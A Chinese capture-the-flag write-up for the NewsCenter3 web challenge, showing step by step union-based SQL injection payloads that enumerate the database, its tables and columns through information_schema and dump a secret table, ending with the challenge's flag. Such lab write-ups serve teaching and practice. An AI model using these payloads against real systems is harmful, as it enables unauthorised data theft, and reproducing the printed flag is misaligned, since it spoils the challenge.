攻防世界-web NewsCenter3

题目描述:如题目环境报错,稍等片刻刷新即可

攻防世界-web NewsCenter3_第1张图片

一、测试

输入:1' 页面直接500

输入:1' or 1 =1 # 页面正常显示

使用:1' order by n # 测试地段数为3

使用联合查询爆数据:-1' union select 1,2,3 #

可以看到2,3位回显,可以通过这两个位置来查询内容

攻防世界-web NewsCenter3_第2张图片

二、查看当前数据库名及数据库用户名

-1' union select 1,database(),user() # 

攻防世界-web NewsCenter3_第3张图片

 三、查看表名:

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

攻防世界-web NewsCenter3_第4张图片

四、查看secret_table的字段(根据表名猜测flag应该在这个表里面):

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='secret_table' #

攻防世界-web NewsCenter3_第5张图片

五、 查看字段的内容

-1' union select 1,2,group_concat(id,fl4g) from news.secret_table #

攻防世界-web NewsCenter3_第6张图片

六、flag:1是id列的值,把1去掉就是flag 

QCTF{sq1_inJec7ion_ezzz}

你可能感兴趣的:(CTF,前端,安全,web安全,mysql,sql)